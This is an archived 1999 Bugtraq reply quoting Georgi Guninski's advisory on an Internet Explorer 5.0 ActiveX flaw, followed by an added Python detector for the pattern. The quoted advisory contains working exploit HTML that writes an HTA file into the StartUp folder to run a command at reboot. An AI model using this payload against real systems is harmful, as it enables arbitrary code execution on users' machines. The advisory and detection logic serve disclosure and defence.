This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well..

Micheal Patterson
pattersonmat_private

----- Original Message -----
From: Georgi Guninski <joroat_private>
To: <BUGTRAQat_private>
Sent: Saturday, August 21, 1999 11:17 AM
Subject: IE 5.0 allows executing programs

> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi Guninski
> is not liable for any damages caused by direct or indirect use of the
> information or functionality provided by this program.
> Georgi Guninski, bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
>
> Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
> allows executing arbitrary programs on the local machine by creating and
> overwriting local files and putting content in them.
>
> Details:
>
> The problem is the ActiveX Control "Object for constructing type
> libraries for scriptlets".
> It allows creating and overwriting local files, and more, putting content
> in them.
> There is some unneeded information in the file, but part of the content
> may be chosen.
> So, an HTML Application file may be created, fed with an exploit
> information and written to the StartUp folder.
> The next time the user reboots (which may be forced), the code in the
> HTML Application file will be executed.
> This vulnerability can be exploited via email.
>
> Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html
>
> Workaround:
> Disable Active Scripting
> or
> Disable Run ActiveX Controls and plug-ins
>
> The code is:
>
> <object id="scr"
> classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> >
> </object>
> <SCRIPT>
> scr.Reset();
> scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
> scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
> scr.write();
> </SCRIPT>
> </object>
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro
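Detection logic for the pattern the advisory describes, added here as an example that is not part of the original post or of Guninski's code: it scans HTML (for instance at a mail gateway or in a web proxy log) for the two CLSIDs quoted above together with a Path property pointing into a StartUp folder and a write() call. The regexes, the finding labels and the sample HTML are constructed assumptions.

```python
import re

# CLSIDs named in the advisory: the "Object for constructing type libraries
# for scriptlets" control and the Windows Script Host shell object.
SCRIPTLET_TYPELIB_CLSID = "06290BD5-48AA-11D2-8432-006008C3FBFC"
WSCRIPT_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"

# classid="clsid:..." in any <object> tag; attributes may be split across lines.
CLSID_RE = re.compile(
    r"classid\s*=\s*[\"']?\s*clsid:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})",
    re.I,
)
# Assumed heuristics: a .Path assignment into a StartUp folder and a .write() call.
STARTUP_RE = re.compile(r"\.Path\s*=\s*[\"'][^\"']*startup[^\"']*[\"']", re.I)
WRITE_RE = re.compile(r"\.write\s*\(\s*\)", re.I)


def find_object_clsids(html: str) -> set[str]:
    """Return the upper-cased CLSIDs referenced by <object classid=...> tags."""
    return {m.upper() for m in CLSID_RE.findall(html)}


def assess(html: str) -> list[str]:
    """Return the constructed finding labels that fire on this HTML, in fixed order."""
    findings = []
    clsids = find_object_clsids(html)
    if SCRIPTLET_TYPELIB_CLSID in clsids:
        findings.append("scriptlet-typelib-object")
    if WSCRIPT_SHELL_CLSID in clsids:
        findings.append("wscript-shell-object")
    if STARTUP_RE.search(html):
        findings.append("path-into-startup-folder")
    if WRITE_RE.search(html):
        findings.append("typelib-write-call")
    return findings


# Constructed sample modelled on the quoted advisory code (payload omitted).
SAMPLE = r"""<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>";
scr.write();
</SCRIPT>"""

if __name__ == "__main__":
    print(assess(SAMPLE))
```

Any one finding on its own is weak evidence; the Scriptlet.TypeLib CLSID combined with a StartUp path and a write() call is the combination worth alerting on.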
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:59 PDT